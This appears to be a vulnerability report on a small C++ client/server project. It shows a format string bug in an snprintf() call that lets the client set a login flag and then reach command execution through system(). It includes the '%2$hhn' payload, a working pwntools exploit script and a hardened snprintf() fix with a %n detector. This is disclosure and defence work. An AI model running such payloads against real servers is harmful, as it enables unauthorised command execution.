Format string vulnerability
The AuthenticationService class has a method registerUser() that registers a user after the login command by creating a corresponding instance of the User class. This User class has an integer attribute called "login" that does not seem important to the server's functionality, as it is always set to 0. However, because it is passed to a vulnerable snprintf() call on line 17 of AuthenticationService.cpp, this login variable can be changed to an arbitrary value, which in turn unlocks some interesting code behavior: once the login variable has been changed to a nonzero value, executing a "ping $HOSTNAME" command passes the $HOSTNAME value as a parameter to a system() call, which of course gives an attacker full server access.
Exploit
1. Start both client and server
2. Perform format string attack by sending "login foo%2$hhn"
3. Profit: send "ping xcalc", for example, which opens a calculator.
The format string is built so that at least one character is printed first ("foo"); then, since the address of the login variable on the stack is the second parameter to the snprintf() call, the number of characters written so far (3) is stored at that address with the %n directive, where "2$" selects the second parameter.
The following Python code performs these steps when run from the project root directory:
from pwn import *

# Step 1: start the server, give it a moment to bind its port, then start the client
server = process('bin/server')
log.info("Waiting 1s to make sure server is up and running")
sleep(1)
client = process(['bin/client', '127.0.0.1', '8080'])

# Step 2: the positional %2$hhn directive stores the number of characters printed
# so far (1, for "a") into the second snprintf() argument, i.e. the login field.
# Sent as bytes so it works unchanged on Python 3 pwntools.
format_exploit = b"login a%2$hhn"
log.info("Sending format exploit to server: " + format_exploit.decode())
client.sendline(format_exploit)

# Step 3: with login nonzero, the ping argument is handed to system()
log.info("Sending ping xcalc")
client.sendline(b"ping xcalc")
log.info("Sleeping 5s to display calculator")
sleep(5)

# Clean up
client.close()
server.close()
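As an added example (not the project's code and not part of the original report), the snprintf() call the report points at in its hardened form, next to a check for the %n-style directive the exploit relies on; the User struct layout and the function names are assumptions:

```cpp
#include <cctype>
#include <cstdio>
#include <string>

// Stand-in for the server's User object (hypothetical layout, not the
// project's class): "login" is the integer a %n write would clobber.
struct User {
    int login = 0;
    char name[64] = {0};
};

// Hardened form of the vulnerable call: the client-supplied name is an
// argument to a fixed "%s" template, so any '%' sequence it contains is
// copied as plain text and no write to the stack happens. The vulnerable
// form differs only in passing name.c_str() as the format itself.
int format_user_safe(User& u, const std::string& name) {
    return std::snprintf(u.name, sizeof u.name, "%s", name.c_str());
}

// Detection helper for the "login ..." command: true when the argument
// carries a %n conversion (e.g. "foo%2$hhn"), allowing for the positional
// "N$" part, flags, width and length modifiers in between. "%%" is a
// literal percent sign and is skipped.
bool has_n_directive(const std::string& s) {
    static const std::string flags = "-+ #0123456789.$";
    static const std::string mods = "hlqjztL";
    for (size_t i = 0; i < s.size(); ++i) {
        if (s[i] != '%') continue;
        size_t j = i + 1;
        if (j < s.size() && s[j] == '%') { i = j; continue; }
        while (j < s.size() && flags.find(s[j]) != std::string::npos) ++j;
        while (j < s.size() && mods.find(s[j]) != std::string::npos) ++j;
        if (j < s.size() && s[j] == 'n') return true;
    }
    return false;
}

// Registration step: reject obvious %n payloads up front, then format with
// the fixed template. Returns false and leaves the User untouched on reject.
bool register_user(User& u, const std::string& name) {
    if (has_n_directive(name)) return false;
    format_user_safe(u, name);
    return true;
}
```

Even without the rejection step, the "%s" template alone keeps login at 0, since the directive is never interpreted; the check only adds a signal worth logging.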
Where
https://github.com/xavierpantet/my_ass_on_your_grass/blob/5ebeb6c98d689621444de3275847f134462da9b7/src/services/authentication/AuthenticationService.cpp#L17
https://github.com/xavierpantet/my_ass_on_your_grass/blob/5ebeb6c98d689621444de3275847f134462da9b7/src/commands/Commands.cpp#L391-L394